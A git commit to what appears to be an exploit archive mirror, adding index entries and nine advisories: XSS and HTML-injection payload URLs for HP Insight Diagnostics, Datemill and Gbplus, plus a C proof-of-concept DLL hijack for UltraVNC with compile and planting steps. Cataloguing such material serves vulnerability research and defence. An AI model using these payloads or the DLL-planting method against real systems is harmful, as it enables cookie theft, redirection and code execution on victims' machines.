Updated 09_08_2014
This commit is contained in:
parent
fe6788f41b
commit
8d2f2b9c4b
11 changed files with 137 additions and 0 deletions
10
files.csv
10
files.csv
|
@ -31107,3 +31107,13 @@ id,file,description,date,author,platform,type,port
|
|||
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
|
||||
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
|
||||
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
|
||||
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0
|
||||
34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 DLL Loading Arbitrary Code Execution Vulnerability",2010-08-30,"Ivan Markovic",windows,remote,0
|
||||
34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 parameters.php device Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 idstatusframe.php Multiple Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 survey.php category Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34546,platforms/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 globals.php tabpage Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34547,platforms/php/webapps/34547.txt,"HP Insight Diagnostics Online Edition 8.4 custom.php testmode Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34548,platforms/php/webapps/34548.txt,"Datemill photo_view.php return Parameter XSS",2009-09-10,Moudi,php,webapps,0
|
||||
34549,platforms/php/webapps/34549.txt,"Datemill photo_search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
|
||||
34550,platforms/php/webapps/34550.txt,"Datemill search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
10
platforms/php/webapps/34541.txt
Executable file
10
platforms/php/webapps/34541.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/42842/info
|
||||
|
||||
Gbplus is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
|
||||
Inject the following data into the vulnerable fields:
|
||||
|
||||
<meta http-equiv="refresh" content="0;url=http://www.example.com/" />
|
10
platforms/php/webapps/34543.txt
Executable file
10
platforms/php/webapps/34543.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/42888/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
|
||||
|
||||
https:///www.example.com/hpdiags/parameters.php?device="</XSS STYLE=xss:expression(location='www.example2.com')>
|
||||
Versions:- 3.0.0.68, 6.0.0.95 linux, 6.1.0.103 linux
|
10
platforms/php/webapps/34544.txt
Executable file
10
platforms/php/webapps/34544.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/42888/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
|
||||
|
||||
https://www.example.com/hpdiags/idstatusframe.php?pid="%20</XSS STYLE=xss:expression(location='www.example2.com')>
|
||||
Versions:- 3.0.0.68, 6.0.0.95 linux, 6.1.0.103 linux
|
11
platforms/php/webapps/34545.txt
Executable file
11
platforms/php/webapps/34545.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/42888/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
|
||||
|
||||
https://www.example.com/hpdiags/survey.php?category=");//}</XSS/*-*/STYLE=xss:e/**/xpression(location='www.example2.com')>&device=1&filename=Prochec
|
||||
kup&mount=1&save=1&surveyLevel=1&target=1
|
||||
Versions:- 3.0.0.68 linux
|
10
platforms/php/webapps/34546.txt
Executable file
10
platforms/php/webapps/34546.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/42888/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
|
||||
|
||||
https://www.example.com/hpdiags/globals.php?tabpage=";alert(1)//
|
||||
Versions:- 3.0.0.68 linux
|
10
platforms/php/webapps/34547.txt
Executable file
10
platforms/php/webapps/34547.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/42888/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
|
||||
|
||||
https://www.example.com/hpdiags/custom.php?testMode=blah';</XSS%20STYLE=xss:expression(location='www.example2.com')>
|
||||
Versions:- 3.0.0.68 linux
|
7
platforms/php/webapps/34548.txt
Executable file
7
platforms/php/webapps/34548.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42896/info
|
||||
|
||||
Datemill is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/friendy/photo_view.php?photo_id=13&return="><script>alert(document.cookie);</script>
|
7
platforms/php/webapps/34549.txt
Executable file
7
platforms/php/webapps/34549.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42896/info
|
||||
|
||||
Datemill is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/friendy/photo_search.php?st="><script>alert(document.cookie);</script>
|
7
platforms/php/webapps/34550.txt
Executable file
7
platforms/php/webapps/34550.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42896/info
|
||||
|
||||
Datemill is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/friendy/search.php?st="><script>alert(document.cookie);</script>
|
45
platforms/windows/remote/34542.c
Executable file
45
platforms/windows/remote/34542.c
Executable file
|
@ -0,0 +1,45 @@
|
|||
source: http://www.securityfocus.com/bid/42846/info
|
||||
|
||||
UltraVNC is prone to a vulnerability that lets attackers execute arbitrary code.
|
||||
|
||||
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
|
||||
|
||||
UltraVNC 1.0.8.2 is vulnerable; other versions may be affected.
|
||||
|
||||
/*
|
||||
====================================================================
|
||||
UltraVNC Viewer - Connection 105 DLL Hijacking Exploit (vnclang.dll)
|
||||
====================================================================
|
||||
|
||||
$ Program: UltraVNC Viewer
|
||||
$ Version: Connection 105
|
||||
$ Download: http://www.uvnc.com/
|
||||
$ Date: 2010/10/08
|
||||
|
||||
Found by Pepelux <pepelux[at]enye-sec.org>
|
||||
http://www.pepelux.org
|
||||
eNYe-Sec - www.enye-sec.org
|
||||
|
||||
Tested on: Windows XP SP2 && Windows XP SP3
|
||||
|
||||
How to use :
|
||||
|
||||
1> Compile this code as vnclang.dll
|
||||
gcc -shared -o vnclang.dll thiscode.c
|
||||
2> Move DLL file to the directory where UltraVNC is installed
|
||||
3> Open any file recognized by UltraVNC
|
||||
*/
|
||||
|
||||
|
||||
#include <windows.h>
|
||||
#define DllExport __declspec (dllexport)
|
||||
int mes()
|
||||
{
|
||||
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
|
||||
return 0;
|
||||
}
|
||||
BOOL WINAPI DllMain (
|
||||
HANDLE hinstDLL,
|
||||
DWORD fdwReason,
|
||||
LPVOID lpvReserved)
|
||||
{mes();}
|
Loading…
Add table
Reference in a new issue